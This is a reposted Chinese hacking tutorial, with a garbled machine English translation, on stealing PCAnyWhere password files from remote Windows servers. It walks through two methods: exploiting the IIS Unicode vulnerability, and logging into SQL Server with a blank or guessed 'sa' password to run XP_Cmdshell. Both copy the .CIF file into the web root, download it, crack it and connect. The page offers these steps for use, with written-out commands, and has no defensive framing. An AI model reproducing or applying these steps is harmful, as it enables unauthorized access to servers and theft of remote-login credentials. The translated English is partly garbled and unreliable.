由于NT的机器一般使用PCAnyWhere进行远程管理,Win2K的机器一般使用了终端进行远程管理,因此如果能够得到PCAnyWhere远程连接的帐号和密码,那么就能远程连接到主机。 As the NT machine for general use PCAnyWhere remote management, Win2K machines generally use a terminal for remote management, so if you can get PCAnyWhere remote connection ID and password, then you can connect to the remote host.
问题的关键就是要得到PCAnyWhere的密码文件(*.CIF),然后使用PCanyWhere密码查看工具( The key is to get PCAnyWhere the password file (*. CIF), and then use PCanyWhere password viewer tool (
http://www.csdn.net/soft/openfile.asp?kind=2&id=7824)便可以取得帐号和密码。 http://www.csdn.net/soft/openfile.asp?kind=2&id=7824) will be able to get an account and password.
PCAnyWhere服务端使用5631端口,可以使用: PCAnyWhere server uses port 5631, you can use:
Telnet 10.10.10.10 5631 Telnet 10.10.10.10 5631
确定远程主机的PCAnyWhere服务端是否开启动。 PCAnyWhere remote host to determine whether to open the server starts.
下面介绍两种方法去得到PCAnyWhere的密码文件: Here are two ways to get PCAnyWhere the password file:
方法一: 使用Unicode漏洞+ PCanyWhere密码查看工具 Method 1: Use Unicode vulnerability + PCanyWhere password viewing tool
下面将使用Unicode工具演示如何使用Unicode漏洞来得到PCAnyWhere的密码文件(*.CIF)。 The following will demonstrate how to use the tool to use Unicode Unicode vulnerability PCAnyWhere to get the password file (*. CIF).
工具下载: Tool to download:
Pcanywhere9.2: http://www.symantec.com/ Pcanywhere9.2: http://www.symantec.com/
下载的Pcanywhere9.2有使用期限, Download Pcanywhere9.2 have used the period,
步骤如下: As follows:
找到主机上的*.CIF文件。 Found on the host *. CIF file.
复制该文件到网站目录下。 Copy the file to the site directory.
使用IE下载该文件。 Using IE to download the file.
使用PcanywherePWD得到用户名和密码。 Use PcanywherePWD get user name and password.
连接登陆。 Connection Log.
具体步骤: Specific steps:
找到主机上的*.CIF文件 Find the file on the host *. CIF
使用dir c:\*.cif /s命令: Use dir c: \ *. cif / s command:
一般Citempl.cif为系统默认的密码文件,因此我们需要SA.CIF文件。 General Citempl.cif default password file for the system, so we need SA.CIF file.
复制该文件到网站目录下。 Copy the file to the site directory.
需要知道网站目录,可以通过ida,idq漏洞进行得到,也可以去寻找网站中的一个图片文件,比如Tscontent.gif文件,然后去查找该文件:使用命令 Need to know web directory, you can ida, idq vulnerabilities to be, you can also look for sites in an image file, such as Tscontent.gif file, then go find the file: use the command
dir c:\ Tscontent.gif /s dir c: \ Tscontent.gif / s
知道目录后,比如为c:\inetpub\wwwroot\ Know the directory, for example, for c: \ inetpub \ wwwroot \
密码文件所在目录:c:\Program Files\pcANYWHERE\DATA Password file directory: c: \ Program Files \ pcANYWHERE \ DATA
下面执行Copy命令: Following the Copy command:
显示1 file(s) copied,就表示复制成功了。 Showing 1 file (s) copied, the copy that success.
使用IE下载该文件 Download the file using IE
使用http://1.1.1.1/sa.cif就可以下载该文件了。 Use http://1.1.1.1/sa.cif can download the file.
使用PCanyWhere密码查看工具得到用户名和密码 Use PCanyWhere password viewing tool to get a user name and password
远程连接 Remote connection
方法二: 使用SQLServer+ PCanyWhere密码查看工具工具 Method 2: using SQLServer + PCanyWhere password viewer tool
由于有些网站的SQLServer的Sa密码一般为空,或者为Sa,也可能和域名相同,如果远程连接到主机的数据库中,同样可以得到密码文件: As some of the site of Sa password SQLServer usually empty, or for the Sa, and domain name may be the same, if the remote host to connect to the database, the same can be password file:
方法如下: As follows:
使用: XP_Cmdshell 'dir c:\*.cif /s' Use: XP_Cmdshell 'dir c: \ *. cif / s'
找到密码文件,然后复制到网站目录下: Find the password file, then copy to the site directory:
XP_Cmdshell 'copy c:\pcanywhere\sa.cif XP_Cmdshell 'copy c: \ pcanywhere \ sa.cif
c:\inetpub\wwwroot' c: \ inetpub \ wwwroot '
然后下载,得到用户名和密码。 Then download, get the user name and password.
Tidak ada komentar:
Posting Komentar